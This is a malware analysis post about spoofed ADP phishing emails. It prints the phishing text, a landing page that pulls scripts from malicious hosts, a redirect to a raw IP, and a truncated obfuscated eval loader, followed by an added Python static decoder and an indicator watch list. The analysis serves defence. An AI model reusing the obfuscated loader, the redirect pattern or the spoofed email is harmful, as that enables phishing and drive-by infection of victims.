More obfuscated Javascript in email messages ADP Funding Notification and ADP Security Management Update


MX Lab, http://www.mxlab.eu, started to intercept new samples with security risks in the form of obfuscated Javascript with subjects like:

ADP Funding Notification – Debit Draft
ADP Security Management Update

The email is sent from spoofed addresses such as ADPClientServices@adp.com and others, and we have detected two different variants in the wild.

The first one is a regular text based email with the following contents:

Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking
business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any
questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services

The second one looks much more professional, with image based headers and a nice looking layout:

In both cases, the embedded URLs lead to web hosts that contain the malicious scripts; the landing page itself only tells the visitor that a redirect is in progress.

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://cyberku.co.cc/s8XVniQE/js.js"></script>
<script type="text/javascript" src="hxxp://maccvision.com/vS5qA1sz/js.js"></script>

</html>

The page claims to be redirecting, but in fact it loads two Javascript files from two different domains.

The Javascript contains the following code:

document.location='hxxp://216.119.142.129/view.php?s=7058dba9af062ccf';

And this URL contains the obfuscated Javascript:

<html><body><script>z=function(){if(window.document)e="ev";c="";if(x)f="fromChar";
d=10;
m=Math;
with(String){
for(i=31596-1;i>=0;i--){   // walks the byte array backwards: the text is stored reversed
	w=i;
	v=a[w];
	dd=(31596-i-2+1);
	b=d;
	dd=dd-b*m["floo"+"r"](dd/d);   // dd = (31595-i) mod 10; Math.floor is spelled out to dodge string matching
	k=v*1+(dd-3);   // each byte is shifted by -3..+6 depending on its position
	if(x&&e)c=c+fromCharCode(k);
}}
e+="a";
md=["a"];
window[e+"l"](c);}   // "ev"+"a"+"l": window.eval(decoded text)
try{5<=prototype;}catch(v){x=1;}   // `prototype` is undefined, so the catch always runs and sets x=1
if(z)g="392828316e736d7837262e2f30392e775d606e666264726066715f2370726d646d656775f6e7
_______SHORTENED_______
a=[];
for(i=0;i<g.length;i+=2){
	a.push(parseInt(g.substr(i,2),16));   // hex string -> array of 31596 byte values
}
z(123);
</script></body></html>
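As an added example that is not part of the MX Lab post: a static decoder that replays the arithmetic of z() above so the payload can be read without ever calling eval(). The post's hex blob is truncated, so the block builds its own constructed sample with the inverse transform; the loop constant 31596 is simply the byte count, so the decoder uses the array length instead.

```python
# Added example, not from the MX Lab post: static decoding of the scheme in z().
# Nothing here executes the decoded text; it is returned as a string for review.

INDICATORS = ("eval", "document.write", "iframe", "document.location", "unescape")


def encode_payload(plaintext: str) -> str:
    """Inverse of the sample's loop; used only to build constructed test input.
    ASCII text only, so every adjusted value stays within one byte."""
    n = len(plaintext)
    out = [0] * n
    for i in range(n - 1, -1, -1):
        # The script appends one char per step for i = n-1 .. 0, so array
        # slot i holds the character at position (n-1-i) of the plaintext.
        pos = n - 1 - i
        dd = pos % 10
        out[i] = ord(plaintext[pos]) - (dd - 3)
    return "".join(f"{b:02x}" for b in out)


def decode_payload(hexblob: str) -> str:
    """Replays z() from the sample:
    a  = bytes parsed two hex digits at a time (parseInt(g.substr(i,2),16))
    dd = (N - i - 2 + 1) mod 10, with N = number of bytes (31596 in the sample)
    k  = a[i] + (dd - 3), appended for i = N-1 .. 0 (text stored reversed)
    The result is returned instead of being handed to window["eval"]."""
    a = [int(hexblob[j:j + 2], 16) for j in range(0, len(hexblob), 2)]
    n = len(a)
    chars = []
    for i in range(n - 1, -1, -1):
        dd = (n - i - 2 + 1) % 10
        chars.append(chr(a[i] + (dd - 3)))
    return "".join(chars)


def suspicious_calls(decoded: str) -> list:
    """Names from a short, constructed watch list found in the decoded text;
    the first thing an analyst greps for after decoding."""
    return [name for name in INDICATORS if name in decoded]


if __name__ == "__main__":
    # Constructed stand-in for the real payload (a defanged redirect stub).
    sample = "document.write('<iframe src=\"hxxp://example.invalid/\"></iframe>');"
    blob = encode_payload(sample)
    print(decode_payload(blob))
    print(suspicious_calls(decode_payload(blob)))
```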

3 thoughts on "More obfuscated Javascript in email messages ADP Funding Notification and ADP Security Management Update"

  1. Obfuscated Javascript can be used in various scenarios and can begin with a determination of the browser and browser version, whether you have Adobe Flash installed and its version, ... but it also can redirect you to a web host where malware is present in an attempt to install those files on your computer.

    Here is a nice example of what it can do:
    http://isc.sans.edu/diary.html?storyid=12700
